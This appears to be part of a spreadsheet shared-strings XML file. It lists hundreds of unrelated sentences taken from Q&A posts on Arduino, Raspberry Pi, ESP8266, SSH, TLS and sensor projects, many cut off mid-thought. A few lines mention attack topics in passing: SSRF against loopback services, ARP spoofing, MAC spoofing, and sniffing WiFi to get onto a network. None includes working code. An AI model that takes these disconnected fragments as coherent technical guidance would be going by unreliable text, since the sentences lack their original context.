    <t>(Your code doesn't check if the first two commands are acknowledged by the SIM900, for example.)</t>
  </si>
  <si>
    <t>Matching between 2 fingerprint are done on template.</t>
  </si>
  <si>
    <t>You would know its address since there cant be more than one external device in AP mode.</t>
  </si>
  <si>
    <t>In order to configure ESP8266 with WiFiManager on board your app would have to:
Scan for WiFi networks and connect to ESP8266's AP (eg.</t>
  </si>
  <si>
    <t>Thrown when a security manager check fails.</t>
  </si>
  <si>
    <t>Turns out the problem was the arduino server itself, it didn't return a 200 code so it failed in Safari iOS.</t>
  </si>
  <si>
    <t>I don't see any point to scan networks while trying to connect to a known WiFi AP anyway.</t>
  </si>
  <si>
    <t>Such
a system consists of sensors (motion detection, switches to detect door
openings), simple algorithms to detect intrusion, local control (arm/disarm) and
remote monitoring of the system so that the police can be summoned.</t>
  </si>
  <si>
    <t>I'm trying to gracefully shutdown a service that I run in a docker container (on a raspberry pi 3 b running raspbian lite), since just issuing 'docker stop' breaks the service (a lock file does not get cleared)
My internet research has shown people working with the bash command 'trap' to execute a command when the script receives a signal to terminate.</t>
  </si>
  <si>
    <t>A Brief Release History
Based on downloads available from http://ftp.gnu.org/gnu/bash/
Additionally, all versions for bash from 2.0 and later received an important patch-level release to address the Shellshock vulnerability in September 2014.</t>
  </si>
  <si>
    <t>This is easy to setup and demo but difficult to maintain and operate due to lack of static public IP for most home internet connections and security concerns of allowing traffic in.</t>
  </si>
  <si>
    <t>The best solution is to set a timeout or locking resource during a specific time (using Mutex / Lock)  
Caution: if you use a Sleep it will freeze you can creat a task and start it.</t>
  </si>
  <si>
    <t>http://www.circuitbasics.com/raspberry-pi-zero-ethernet-gadget/ 
The result of this is a full network interface that you can not only use to transfer data over a TCP/IP socket but at the same time run a SSH-connection to start and monitor your application.</t>
  </si>
  <si>
    <t>Since both the sms number and code is strictly personal, I would not like to tell my carpenter the codes, but in the mean while he is working at my home, I can give him a login to my site, where he can see if the alarm is turned on or even turn it on/off by him self.</t>
  </si>
  <si>
    <t>In general, any machine that's insecure enough to allow drivers to be replaced is wide-open for any kind of attack, not just through a serial port.</t>
  </si>
  <si>
    <t>When an application checks the licensing status, the
  Google Play server signs the licensing status response using a key
  pair that is uniquely associated with the application.</t>
  </si>
  <si>
    <t>The JNLP API provides services for sand-boxed applications to achieve functionality (such as printing, opening a browser or accessing the local disks) that is normally reserved for trusted applications.</t>
  </si>
  <si>
    <t>I saw here and here how to create a simple reboot script and here how to check if a service is running, but found nothing on how to check for an improper shutdown.</t>
  </si>
  <si>
    <t>I didn't think it would be necessary to have it connected upfront as the majority of the steps in the walkthrough are about getting the Azure IoT Suite remote monitoring solution setup.</t>
  </si>
  <si>
    <t>However I found that if I turn on 2-factor auth and set a app-specific password then I can successfully log in to my gmail account.</t>
  </si>
  <si>
    <t>When you have found a solution, you must set your decryption method back to expect the correct padding.</t>
  </si>
  <si>
    <t>On a separate post, I found that other people found success by adding a privacy description.</t>
  </si>
  <si>
    <t>I am doing some projects with Arduino at the moment, and I was wondering if it is possible to make HTTP requests without the Internet shield.</t>
  </si>
  <si>
    <t>I've done some additional research on this and it seems that Arduino is unable to connect to web servers over a secured (https) connection.</t>
  </si>
  <si>
    <t>VNC or SSH will not be able to work behind NAT without activating port forwarding because the router will try to open it's own port instead of your target station.</t>
  </si>
  <si>
    <t>This 'unclean shutdown' means a re-start of the container fails as mongodb complains about a lock file being in a bad state.</t>
  </si>
  <si>
    <t>I need help to setup or write a software (preferably in Delphi) to capture "BACNET alarms" from devices for my research project.</t>
  </si>
  <si>
    <t>The Ethernet shield acts as a webserver and sends a simple message back to a UIWebview in the App.</t>
  </si>
  <si>
    <t>This RPi has a static internal IP address (and the same iface mac address), as both Operating Systems have a public IP whenever they are running, allowing me to  SSH from work.</t>
  </si>
  <si>
    <t>I know that I have to implement port forwarding in my router, but which port uses SVN and how can I manage to have some security over this service?</t>
  </si>
  <si>
    <t>I don't want to ssh on the system, i  want to mount it inside the Windows operating system, so that i can directly write to it without establishing a ssh connection for example.</t>
  </si>
  <si>
    <t>On the web application, the user enters the MAC address for the Raspberry he wants to register
The user receives a new GUID for this raspberry
A user can upload content (i.e.</t>
  </si>
  <si>
    <t>I know you can register the Arduino using 
But I require something similar to this (pseudo code)
And when a request is received, I need to know with what address the Arduino was queried.</t>
  </si>
  <si>
    <t>Once logged in, the user is presented with a page containing buttons to interact with the gpio pins via a javascript call to a bash script in the cgi-bin directory.</t>
  </si>
  <si>
    <t>My goal is to create a sort of password-like system where if you push the right buttons in the right order then a button will light up.</t>
  </si>
  <si>
    <t>Trying to connect with HeidiSQL I get the output (no matter what username/password i try):
Can't connect to MySQL server on 'adress' (10061)'
mysql -V gives output:
mysql  Ver 15.1 Distrib 10.0.27-MariaDB, for debian-linux-gnueabihf (armv7l) using readline 5.2
My RPi info is
Linux redface 4.4.26+ #915 Thu Oct 20 17:02:14 BST 2016 armv6l GNU/Linux
The user privileges are available in the image below 
How can I connect to the database again using HeidiSQL?</t>
  </si>
  <si>
    <t>I'm trying to create an Android app that can send a confirmation message, either a string or an encrypted signal, over WiFi to my raspberry pi connected to the same WiFi network.</t>
  </si>
  <si>
    <t>If the barcode is valid, the Adafruit NeoPixel Ring will be green and a success tone is played on the buzzer, and it the barcode is invalid, the light will be blue and a failure tone is played on the buzzer.</t>
  </si>
  <si>
    <t>I guess I have to store some credentials and use them to re-establish the connection - but where do I get the credentials, and how do I reconnect?</t>
  </si>
  <si>
    <t>I can connect and pair and trust both boards from the RPi3 via bluetoothctl and see their UUID services just fine.</t>
  </si>
  <si>
    <t>working on Pi3
Situation: only one server in  is given and this given address is invalid (no NTP-Server running on that address).</t>
  </si>
  <si>
    <t>I have had success passing login information in the form of:
This works nicely when the username and password attribute names are always the same, but not when they change on every refresh.</t>
  </si>
  <si>
    <t>I'm trying to SSH into a Raspberry Pi on a subnet via ethernet using the Fabric module but I can't figure out how to authenticate the connection.</t>
  </si>
  <si>
    <t>I tried changing the verify function around, that ended up making the green led the one that always shone.</t>
  </si>
  <si>
    <t>Inside this module, a user defined callback function can be registered on pin status change.</t>
  </si>
  <si>
    <t>Here is the master.cf:
This is my main.cf
Basically, I want to be able to send and receive mail from anywhere as long as the domain and user exist on the server and authenticate with IMAP SSL on 993 and SMTP StartTLS on 465.</t>
  </si>
  <si>
    <t>I have added the others as well, namely subnetMask, gatewayIP however when I used the documented method (as per your link) to print the MAC address - namely - Ethernet.MACAddress(macBuffer); I got an error.</t>
  </si>
  <si>
    <t>WiFi.begin("ssid", "password");
So the "performance bug" has to be caused by the soft access point / network stack that is used by the ESP8266.</t>
  </si>
  <si>
    <t>I have tried calling this code in my onCreate():
and adding wifi/network permissions to AndroidManifest.xml but the app runs only briefly and I lose the wifi connection.</t>
  </si>
  <si>
    <t>This is the post that makes me believe this: Docker Access to Raspberry Pi GPIO Pins , it implies that it is as simple as running docker with privileged.</t>
  </si>
  <si>
    <t>But I don't know how to make the NFC shield send back to the Android device a response: valid key or not.</t>
  </si>
  <si>
    <t>While not a specific answer to your question, with this type of communication some packet error checking would be beneficial.</t>
  </si>
  <si>
    <t>Sending a remote ATMP to end devices will give you the 16-bit network address of their parent.</t>
  </si>
  <si>
    <t>When function2 attempted to acquire the lock, it would automatically wait until the lock was released.</t>
  </si>
  <si>
    <t>KeyReport is the data structure that represents the USB message sent to the host computer.</t>
  </si>
  <si>
    <t>Once you create account,you can send push notification from Parse dashboard.</t>
  </si>
  <si>
    <t>There is a bug for this, but there is also no progress for years: https://bugzilla.redhat.com/show_bug.cgi?id=864894
So, if you care about the security of the email account you use for your servers outgoing emails, do NOT use ssmtp.</t>
  </si>
  <si>
    <t>So I changed the REST service to use port 6001 (which I then verified is not a restricted port) and then the service worked in both safari and chrome.</t>
  </si>
  <si>
    <t>The use of the watchdog was to ensure portability of the port to all Arduinos and all applications regardless of their timer use; however you only need it to work on your hardware and your application, so adapting it to that is entirely legitimate.</t>
  </si>
  <si>
    <t>After manually setting the IP address of the client using 
the connection could be made using the AT commands above.</t>
  </si>
  <si>
    <t>If you don't want to manually enter the rails db id for each PI unit you can create a "discovery route" where the PI sends its MAC address and gets an id.</t>
  </si>
  <si>
    <t>There is a flaw in your design which is if you plan on authenticating with a pin the raspberry pi needs some way to tell the user what the pin should be.</t>
  </si>
  <si>
    <t>through a wired LAN connection), it can share the Internet access with other devices connected to your device over the Wi-Fi SoftAP via Internet Connection Sharing (ICS).</t>
  </si>
  <si>
    <t>Break it down like this...
1) When a user creates an account on the network, pass in a UUID and their phone number.</t>
  </si>
  <si>
    <t>New issue discovered compiling the Arduino sketch gave me an "undeclared functions prov_dev_set_symmetric_key_info and hsm_client_set_registration_name_and_key" error.</t>
  </si>
  <si>
    <t>Enter this IP Address into the box and ensure that connection type "SSH" is selected.</t>
  </si>
  <si>
    <t>You'd also be adding the security concerns of a Host server to this device, and you'd need to worry about maintaining a consistent IP address (or something).</t>
  </si>
  <si>
    <t>If the attempt is successful, the hacker can view restricted files or even execute commands on the server.</t>
  </si>
  <si>
    <t>Data masking is a method of protecting or hiding data with random characters, such as the mask used on a  password entry field.</t>
  </si>
  <si>
    <t>An Internet Protocol address (IP address) is a numerical label assigned to each device in a computer network that uses the Internet Protocol for communication.</t>
  </si>
  <si>
    <t>Additionally, its also possible for an attacker to leverage SSRF to access services from the same server that is listening on the loopback interface (for instance, 127.0.0.1).</t>
  </si>
  <si>
    <t>For example, you can easily design something that sniffs, mangles, and sends at the same time you are doing an ARP-Spoofing attack.</t>
  </si>
  <si>
    <t>Similarly to other recent Samsung flagship devices, it also includes a heart rate sensor and fingerprint scanner.</t>
  </si>
  <si>
    <t>Connecting to an on-premises directory is easy and once this connection is established, all users can access AWS resources and applications with their existing corporate credentials.</t>
  </si>
  <si>
    <t>A
client encodes an RPC in XML and sends it to a
server using a secure, connection-oriented session.</t>
  </si>
  <si>
    <t>Just resting the LCD on the headers without solder or jabbing the lcd pin holes with jumper wires don't make reliable connections.</t>
  </si>
  <si>
    <t>Now I have two wifi networks so I tried to connect to the other network but failed to connect to that one even by removing the wpa_conf line and directly providing the SSID and password in the /etc/network/interfaces file.</t>
  </si>
  <si>
    <t>I assume it's because permissions aren't set properly for the server (I tried running the commands as sudo but still no luck).</t>
  </si>
  <si>
    <t>For entering the SSID and password that the Pi needs to connect to, we have a little GUI interface running that allows the user to send these details to the Pi.</t>
  </si>
  <si>
    <t>I tried to check if its even possible to create a ssh connection to my pi from the emulator and downloaded JuiceSSH and everthing went fine...</t>
  </si>
  <si>
    <t>There's a tiny switch on the side of the adapter, turn it to un locked.</t>
  </si>
  <si>
    <t>If nothing works, try to replace this piece of code
With this
If this code sais:
Failed to configure Ethernet using IP address.</t>
  </si>
  <si>
    <t>Several FTDI chips can be configured to behave like this (appropriate pin must be connected to tx enable).</t>
  </si>
  <si>
    <t>It is suggested that before you attempt to jailbreak your device that you back it up and read the proper documentation for your device and OS version.</t>
  </si>
  <si>
    <t>I've edited my sudoers file using  to not require passwords, for GPIO access.</t>
  </si>
  <si>
    <t>I am attempting to create a verification system in which I use the UID of the card to turn on an L.E.D.</t>
  </si>
  <si>
    <t>Connect to ESP8266 and give it SSID and PASSWORD info from current Wifi.</t>
  </si>
  <si>
    <t>This is the simple code where i'll use me Android phone to send the password to the ArduinoMKR1000 over a network which will in turn check your password and unlock the gift.</t>
  </si>
  <si>
    <t>But, in Azure IoT Hub and DPS SHA1 fingerprints are used to check that the device public key is reliable.</t>
  </si>
  <si>
    <t>Is this the correct connection string for the 'X.509 CA-Signed' case?</t>
  </si>
  <si>
    <t>Send a secret string in a request header that is then checked on server.</t>
  </si>
  <si>
    <t>Since re-inventing the wheel is useless, I suggest you to use the  library, which handles debouncing for you.</t>
  </si>
  <si>
    <t>"Granted access" was prompt, therefore serial object was found.</t>
  </si>
  <si>
    <t>On the other hand, I found Guido van Rossum's email where he states that you shouldn't use sendall with a non-blocking socket.</t>
  </si>
  <si>
    <t>Edit:
And as @MaximilianGerhardt already answered, you need to prepend Basic to your Authorization header.</t>
  </si>
  <si>
    <t>So open the serial monitor and type AT to verify.</t>
  </si>
  <si>
    <t>FAILED, proxy is disconnected
How to handle this AccessControlException.?</t>
  </si>
  <si>
    <t>thanks in advance
edited
just found out that same error occurred on eth0 module.</t>
  </si>
  <si>
    <t>What I Am looking for is a list of hardware that I need (other than the rpi2 for the first case and laptop for the second) that will enable me to sniff out WiFi signals,  and attempt to get onto the network.</t>
  </si>
  <si>
    <t>SOLUTION:
By looking at the EUID with var_dump(posix_geteuid(); I was able to validate the actual user, which does NOT match the get_current_user();.</t>
  </si>
  <si>
    <t>[preflight] Running pre-flight checks
[preflight] The system verification failed.</t>
  </si>
  <si>
    <t>I've used Advanced IP Scanner for finding Rpi's IP address.</t>
  </si>
  <si>
    <t>First, I use  and it can successfully scan my devices and build connection.</t>
  </si>
  <si>
    <t>I double checked this by connecting to the server with another PC, fetching the certificate and recalculating its fingerprint.</t>
  </si>
  <si>
    <t>I have checked uuid via kontakti.io app but get up several different uuid and do not know which one is the unique one that I can use to scan in raspberry pi.</t>
  </si>
  <si>
    <t>When you see "password:", send the password and let the expect command end.</t>
  </si>
  <si>
    <t>First, find your ip and gateway settings
ifconfig
That should display your ip address.</t>
  </si>
  <si>
    <t>Generally, for a 802.1x-authentication over RADIUS, one would indeed expect to see several packets.</t>
  </si>
  <si>
    <t>In both cases you should ensure that your adress is valid.</t>
  </si>
  <si>
    <t>After many days trying, I use sniffer to scan the package data in network.</t>
  </si>
  <si>
    <t>Code checking
Try shorting your chips Rx to Tx and see if you are able to receive an echo.</t>
  </si>
  <si>
    <t>InformationSecurity) as your question will have more traction there and you're more likely to find a suitable answer.</t>
  </si>
  <si>
    <t>SMTP-Error occur when we are not able to connect SMTP Host or failed to authenticate.</t>
  </si>
  <si>
    <t>Stop polluting your ~/bin directory and your .bashrc file, fork/clone Bash it and start hacking away.</t>
  </si>
  <si>
    <t>When i run the same command sudo echo 'on 0' | cec-client -s (or without sudo ) in ssh connection the tv turns on, EVEN when i login as www-data on ssh.</t>
  </si>
  <si>
    <t>I found out this is because Blueterm allows insecure connections.</t>
  </si>
  <si>
    <t>I hard coded both the SSID and Password in the WiFi.begin() as a sanity check and sure enough it connects.</t>
  </si>
  <si>
    <t>I could not find a Policy with a key matching the one my device is using.</t>
  </si>
  <si>
    <t>And I have already realized TLS authentification connection in device mode.</t>
  </si>
  <si>
    <t>I got the ssh to work properly and start at boot.</t>
  </si>
  <si>
    <t>I expect this to just connect, but I'm thinking I'm missing a certificate setup somewhere.</t>
  </si>
  <si>
    <t>Like Badmaster's answer, the Client will try to reconnect to the AP in my case and it got connected.</t>
  </si>
  <si>
    <t>The first thing to check is that the i2c device is connected properly.</t>
  </si>
  <si>
    <t>The output file is still opened by "you" (not root) before sudo runs.</t>
  </si>
  <si>
    <t>If you did this with a firmware that's got DEBUG enabled you'd see that the SSL handshake fails.</t>
  </si>
  <si>
    <t>It would be helpful to have the actual values for IP address, netmask and gateway for the nodemcu, rpi and laptop to pursue this further.</t>
  </si>
  <si>
    <t>After device registration you can connect to Cumulocity and start sending data.</t>
  </si>
  <si>
    <t>Windows Registered Input/Output (RIO)</t>
  </si>
  <si>
    <t>backData is checked against the key for user2, matching.</t>
  </si>
  <si>
    <t>I tried from following links
novitiate.co.uk/?p=183
lcdev.dk/2012/11/18/raspberry-pi-tutorial-connect-to-wifi-or-create-an-encrypted-dhcp-enabled-ad-hoc-network-as-fallback/
sirlagz.net/2013/02/10/how-to-use-the-raspberry-pi-as-a-wireless-access-pointrouter-part-3b/
Error are as follows:
Starting advanced IEEE 802.11 management: hostapdSegmentation fault
Debug : When I googled for the above error , some forums suggested to hardcode the path of wifi adapter driver.</t>
  </si>
  <si>
    <t>I used to have the same problem, and problem is not related with code and solution is just disable login on serial port,
there is a file at /etc/inittab
open this file with nano and find this line:   
and put a # char at begining this line than save and reboot and it is working weirdly.</t>
  </si>
  <si>
    <t>I'm open to any possibilities, including things like:
Making use of private APIs on the Apple TV
Running an 'always on' program in the background of the Apple TV that sends a signal when the Apple TV wakes up, if that's even possible.</t>
  </si>
  <si>
    <t>NO : The following error is due to an non-user permission
[ERROR] [DAAPI] iso=-1:cannot open /dev/mem
Well, But I don't receive message...
END EDIT
I write the following javaME code to do this :
"this" is my class which manage serial communication.</t>
  </si>
  <si>
    <t>The solution was to listen to the device keys entered in with:
I have found that the keys that are assigned an integer are quite difficult to compare against since there is seemingly no virtual key registered for them.</t>
  </si>
  <si>
    <t>Assuming that your non-AWS cloud provider does not support mutual TLS authentication (or the alternative of MQTT over websockets) then you are left with adding a layer of indirection that sends the JSON to AWS IoT.</t>
  </si>
  <si>
    <t>"MAC spoofing is a technique for changing a factory-assigned Media Access Control (MAC) address of a network interface on a networked device" (Wikipedia)</t>
  </si>
  <si>
    <t>The command I used to set the fuses was taken from what Eclipse generated: -Ufuse4:w:0x1:m
Is there a way to "break into" the device and re-establish communication?</t>
  </si>
  <si>
    <t>I follow the guide in this site http://elinux.org/RPi_Serial_Connection to disable linux from using serial port, but it's clearly that this will also prevent me from log in to Raspberry Pi by using Minicom.</t>
  </si>
  <si>
    <t>Taking most of my code from the various official exemples, I managed to have the WiFi shield to successfully connect to a WiFi (WPA) network (according to the board and the smartphone hosting the network).</t>
  </si>
  <si>
    <t>So, I am actually trying to join these two codes with these functionalities (Request the Activation Keys to connect with KPN Network, as well as the sender sensor data), and it seems to compile properly, however, it is not sending any data, so probably the code is wrong.</t>
  </si>
  <si>
    <t>I want to setup a register / discover type of service connection between 2 devices on the same wireless LAN.</t>
  </si>
  <si>
    <t>The server hosting this script is on one of the Pis that I want to SSH into, and that Pi also is acting as an access point for the other Pi and my laptop to connect to (everything is a LAN, not connected to the Internet).</t>
  </si>
  <si>
    <t>The answer of the slave is a struct:  
Example:
M board asks for user's information (struct) by sending the command GET_USER_INFO.</t>
  </si>
  <si>
    <t>Using WireShark shows me that the Home app does not send any mDNS requests until an (already discovered) device is clicked on.</t>
  </si>
  <si>
    <t>I already enabled CloudWatch and get the following events:
(I did not send the disconnect, it came from aws)
My policy document should not be the problem, because I got the basicPubSub-Example with the same certificate-files to work.</t>
  </si>
  <si>
    <t>Solid overtravel protection built into the robot itself that triggers an e-stop is necessary anyway, you can't trust that sensor either.</t>
  </si>
  <si>
    <t>Then to receive this in python I used your solution, and added a function to compare the the two outputs for verification purposes.</t>
  </si>
  <si>
    <t>While you might be able to accidentally print reasonable looking output from that result, there's a bug here in that you're accessing data that's no longer valid.</t>
  </si>
  <si>
    <t>Just make sure not to send anything dangerous - don't randomly send command A if for device 2 it means "delete everything and power off".</t>
  </si>
  <si>
    <t>There are 2 things that could help limit potential errors linked to disconnecting/reconnecting:
Use X509 certificates instead of connection strings to authenticate.</t>
  </si>
  <si>
    <t>There is an assembler trick made by Doctor Yoda at instructables.com based on ATMEGA328P-PU (for example arduino UNO) that will probably help to fake a serial connection in such a high frequencies.</t>
  </si>
  <si>
    <t>The serial API does not provide for any of the sort of identification that you seem to desire so the only choice that you have is to poll he various ports.</t>
  </si>
  <si>
    <t>A 32-byte binary identifier (often represented as a 64 character HEX String) used to identify an iOS device for the purpose of sending it Apple Push Notifications.</t>
  </si>
  <si>
    <t>An unknown host is an error message that generates when a destination computer or host server name cannot be resolved.</t>
  </si>
  <si>
    <t>Output Controls  ensures that computer output is not distributed or
displayed to unauthorized users.</t>
  </si>
  <si>
    <t>Transactional emails are just one-off emails triggered by some action like signing up for an account or requesting a password reset.</t>
  </si>
  <si>
    <t>It also makes it possible to run tests without a network connection or in situations where the server is behind a firewall or has host-based access controls.</t>
  </si>
  <si>
    <t>When installed, the Beacons begin transmit 2.4 GHz Bluetooth signals, similar to those of your home WiFi.</t>
  </si>
  <si>
    <t>DCCP implements reliable connection setup, teardown, Explicit Congestion Notification (ECN), congestion control, and feature negotiation.</t>
  </si>
  <si>
    <t>Network scanning is a procedure for identifying active hosts on a network, and the services running on those hosts.</t>
  </si>
  <si>
    <t>Note: The autocomplete attribute works with  and the following  types: text, search, url, tel, email, password, datepickers, range, and color.</t>
  </si>
  <si>
    <t>Geocoding can be a highly sophisticated task as it often has to deal with unstructured or poorly structured address data and ambiguous or localized representations of addresses.</t>
  </si>
  <si>
    <t>They may contain various identification data such as name, address, phone numbers, e-mail addresses, URLs, logos, photographs, audio clips and etc.</t>
  </si>
  <si>
    <t>It also appears to me that '/sys/class/gpio' is a virtual path to '/sys/devices/gpio', looking at the permissions on that folder, the gpio group has permissions there too, and of course, so does root.</t>
  </si>
  <si>
    <t>You can let a linux-level driver create a serial interface
You will need to have whatever creates the serial device (/dev/ttyUSB0 or /dev/ttyACM0 or the like) set the permissions to allow all users access.</t>
  </si>
  <si>
    <t>To make this change, you need to ensure that the FTDI USB-serial device hasn't been claimed and attached to Virtualbox guestVM, i.e.</t>
  </si>
  <si>
    <t>Since this new UUID you created is not supported by Bluetooth, you have to take care of decoding this UUID from the other device to which you are sending date.</t>
  </si>
  <si>
    <t>In addition, you can detect the network connection via NetworkInformation.NetworkStatusChanged.By this, the app is able to know if the network is invalid, as the main reason causes the StreamSocket disconnected.</t>
  </si>
  <si>
    <t>TCP provides reliable, ordered, and error-checked delivery of a stream of octets (bytes) between applications running on hosts communicating via an IP network.</t>
  </si>
  <si>
    <t>The best idea would be to use the LoRaWAN protocol which allows to verify the source of the packet via the device address and the message integrity code.</t>
  </si>
  <si>
    <t>The akka-camel module allows Untyped Actors to receive and send messages over a great variety of protocols and APIs.</t>
  </si>
  <si>
    <t>Forge Webhooks API allows applications to listen to Forge events, and receive notifications when they occur.</t>
  </si>
  <si>
    <t>This software, reading the GPIO, must not ask for admin rights - but those pins have to be set somehow (may be by the driver) to input mode.</t>
  </si>
  <si>
    <t>I'm trying to check if my raspberries are online from outside my home but for security reasons I CANNOT open any port on my routeur.</t>
  </si>
  <si>
    <t>If we put in a "sleep" in order to wait for a fraction of a second, the permissions change so the group permission has write permissions.</t>
  </si>
  <si>
    <t>Edit #2: I found out that after each time I try to upload a sketch, the permissions always get changed to crw-rw---- 1 root dialout 166, 0 mei 24 11:38 /dev/ttyACM0</t>
  </si>
  <si>
    <t>There's more info on WiFiClientSecure at Client Secure, including another example of how to find a server's fingerprint under Windows.</t>
  </si>
  <si>
    <t>In your case you must register your event like:
and the open it
As a result the evet will fire whenever data received.</t>
  </si>
  <si>
    <t>(This is risky but if you can encrypt your payload in some other reliable way, can prove to be a viable option)
As suggested by Itay, try alternate serialisation options such as protocol buffers or flatbuffers.</t>
  </si>
  <si>
    <t>Right at the top of the method, there is a check:
// TODO: Ensure no active non-server client connection.</t>
  </si>
  <si>
    <t>Is there any chance to activate some more granular logging to understand why connection establishment fails with '0x5: Not Authorized'?</t>
  </si>
  <si>
    <t>Also, when the serial monitor is open, I can ssh into the box and run commands like 
 completely fine.</t>
  </si>
  <si>
    <t>I want to be able to pair without a PIN (the device will not have a screen), but the pairing fails any time the device is selected.</t>
  </si>
  <si>
    <t>I do use ssh quite a lot, but this case I find it easier to have the monitor directly connected to the pi.</t>
  </si>
  <si>
    <t>I have a problem that i want to access fingerprint template from sensor R305 and store it in a database.</t>
  </si>
  <si>
    <t>I've not tried using the AWS IoT SDKs against a local broker but your log shows that the SSL handshake failed.</t>
  </si>
  <si>
    <t>To check the plugin type
You may see that mysql_native_password is not there..
so to setup you may write these commands..</t>
  </si>
  <si>
    <t>If the connection fails, the esp creates an AP and the user can enter new credentials.</t>
  </si>
  <si>
    <t>Found the answer as I was trying to import the certificate with the Root and was testing with a different user.</t>
  </si>
  <si>
    <t>I have written a library based on "Adafruit Fingerprint Sensor Library".</t>
  </si>
  <si>
    <t>I could even fake the call to IoT Device Portal, if there is no other way to do this properly - but I haven't been able to find it there anyway.</t>
  </si>
  <si>
    <t>Anyone have any clue how to find any device info based on knowing the COM ports?</t>
  </si>
  <si>
    <t>Waveshare Capacitive Fingerprint Reader Development Manual
in this site 
Capacitive Fingerprint Reader Wiki
[https://www.waveshare.com/wiki/Capacitive_Fingerprint_Reader.]</t>
  </si>
  <si>
    <t>As far as I can imagine there probably is a character that doesnot get parsed the right way and was not detected by the verifier I used to check if the file was actually utf-8 decodeable.</t>
  </si>
  <si>
    <t>There is no memory protection in AVR, so strcpy() will happily start copying the string to address 0 in RAM.</t>
  </si>
  <si>
    <t>This will check if any device is connected and if it connected, it will return it unique id number.</t>
  </si>
  <si>
    <t>From my experience with Bluez 5.15
Ensure you have no connections to the BLE device (check with hcitool con).</t>
  </si>
  <si>
    <t>Under Connection-&gt;SSH-&gt;X11, tick 'enable X11 forwarding' before you start your session.</t>
  </si>
  <si>
    <t>You could self monitor this way and still likely get your Home Insurance discount for having a monitored alarm system, but without paying the monthly fee.</t>
  </si>
  <si>
    <t>Since beacons and probe request will start being sent automagically from the sender to the receiver.</t>
  </si>
  <si>
    <t>If it worked, turn on your firewall and then unblock the tcp port using the following command:</t>
  </si>
  <si>
    <t>PuTTY is an open source SSH and Telnet client.</t>
  </si>
  <si>
    <t>However, I could not check if it succeeded or what firmware version was installed before.</t>
  </si>
  <si>
    <t>I made my codes and I notice that something wrong in my output.</t>
  </si>
  <si>
    <t>I want to be able to access the owncloud, the VPN and the baby monitor via their respective private IP - addresses?</t>
  </si>
  <si>
    <t>They're just printing new lines into username input.</t>
  </si>
  <si>
    <t>From the serial console:
Other forums suggested the unlock command.</t>
  </si>
  <si>
    <t>I did open a port 6000 in my firewall but anything happened.</t>
  </si>
  <si>
    <t>Trying to setup TLS on ESP8266 and found a tutorial that said I must first convert the PEM certificates to DER.</t>
  </si>
  <si>
    <t>Turn off the digit with the common pin.</t>
  </si>
  <si>
    <t>Sounds like you didn't open the port 1883 in your security group.</t>
  </si>
  <si>
    <t>The first is you will need to find out which fingerprint scanner you have in your laptop.</t>
  </si>
  <si>
    <t>You might need to use an 802.15.4 sniffer to monitor communications to see what's happening.</t>
  </si>
  <si>
    <t>DateTime problem
The Arduino environment does not include a  file, it was renamed to wiring_private.h.</t>
  </si>
  <si>
    <t>Check if your program has permission to comunicate throw serial comunication.</t>
  </si>
  <si>
    <t>PIRs : Bosch 4 pin PIRs (well, 6 if you include tamper) connection.</t>
  </si>
  <si>
    <t>Particularly, I am wondering how does connecting a monitor through HDMI affect ssh connection?</t>
  </si>
  <si>
    <t>I am trying to use the Grove fingerprint sensor on a project.</t>
  </si>
  <si>
    <t>My Google-fu so far has informed me that Arduino users have been able to connect to WPA2 Enterprise EAP-TLS (certificate based authentication) (link) but not (SSID, username, pwd) networks.</t>
  </si>
  <si>
    <t>I have also tried using the serial monitor in the arduino IDE which also only worked as root.</t>
  </si>
  <si>
    <t>0x5 - Read failed - Try keyB - Failed authentication block nb.</t>
  </si>
  <si>
    <t>At a certain point, the shell script ask for a user input ( a Y/N confirmation ).</t>
  </si>
  <si>
    <t>I don't want to jump to the "something got corrupted" explanation  but that really seems to have been the case.</t>
  </si>
  <si>
    <t>I guess it happens because you send an sudo command and your Raspberry Pi is expecting an password.</t>
  </si>
  <si>
    <t>scan_ssid=1 scans for hidden SSID's.</t>
  </si>
  <si>
    <t>To access https there is a required fingerprint you will need to provide in the sketch.</t>
  </si>
  <si>
    <t>NonInteractive | Suppresses prompts for user input or confirmations.</t>
  </si>
  <si>
    <t>How can I stop retries if the authentification fails?</t>
  </si>
  <si>
    <t>Is there a way to find the key codes or is there anything else anyine can suggest?</t>
  </si>
  <si>
    <t>In most cases this causes TCP connections to be reset.</t>
  </si>
  <si>
    <t>and check if it is scanned or not in the mobile also.</t>
  </si>
  <si>
    <t>I'm setting up The wifi SSID and Password of arduino specifically the esp-01 to be change by sending data (SSID &amp; Password) to firebase then to PHP and to arduino 
I tried many possible solutions and read articles that are related to what I wanted to be the result but none of it works
I am using an app to send data to firebase
Given the code for both Arduino and PHP (firebase)
Arduino code
PHP code
I hope you can help me with the objective I wanted to finish
Thank you so much
more power!</t>
  </si>
  <si>
    <t>Edit: After editing my question the first time I continued researching and found this article: Off Site Encrypted Backups using Rsync and AES
This article covers backing up files to a remote machine and encrypting them before transmitting them.</t>
  </si>
  <si>
    <t>I asked a similar question here: Embedded - GPIO Key does not register but I am tying to take a step back and focus on just one part of that question.</t>
  </si>
  <si>
    <t>Does anyone have any ideas about how I could set up the Raspberry Pi constantly testing if a given address has received a certain amount of Bitcoin.</t>
  </si>
  <si>
    <t>I'm using the recommendend Nuget library by IBM : IBMWIoTP
I tried to set TLS optionnal in security but this doen't solve the issue
I found the exact moment i have the uncatched exception, in the IBMWIoTP library source code, on the connect method:
connevtionState = mqttClient.Connect(clientId, clientUsername, clientPassword,cleanSession,keepAlivePeriod);</t>
  </si>
  <si>
    <t>And c12 register will hold the base address of both secure and NS world exception vector table base addresses.</t>
  </si>
  <si>
    <t>I need a way to add this acceptance into the script IE I ge the following if I launch the command without sshpass:
The authenticity of host 'IP (IP)' can't be established.</t>
  </si>
  <si>
    <t>This is an output of the Rails server when I try to reach a page:
I'm quite new to all that but from my understanding, I should somehow communicate my certificate and key to Rails so it is able to decrypt the request?</t>
  </si>
  <si>
    <t>When not connected to Internet (to test offline functionality) I was getting access violation exceptions, because my timer interval was shorter than the timeout for the S3 PutObjectRequest.</t>
  </si>
  <si>
    <t>For now I've tested with two nodes and since there isn't Listen Before Talk I need to reserve much more time for safety for each uplink message, which is not ideal.</t>
  </si>
  <si>
    <t>Re-sending the message at least once (assuming DSR is raised) if a timeout occurs makes your protocol more reliable.</t>
  </si>
  <si>
    <t>If parity bits are enabled, those will also need to be processed either during transmission to be sent out with the data or after a receive to determine whether the data was transferred successfully.</t>
  </si>
  <si>
    <t>If you select that and define the "loop" function as follows, you should be able to send those commands and get verification that you are, in fact, talking to the bluetooth bee:</t>
  </si>
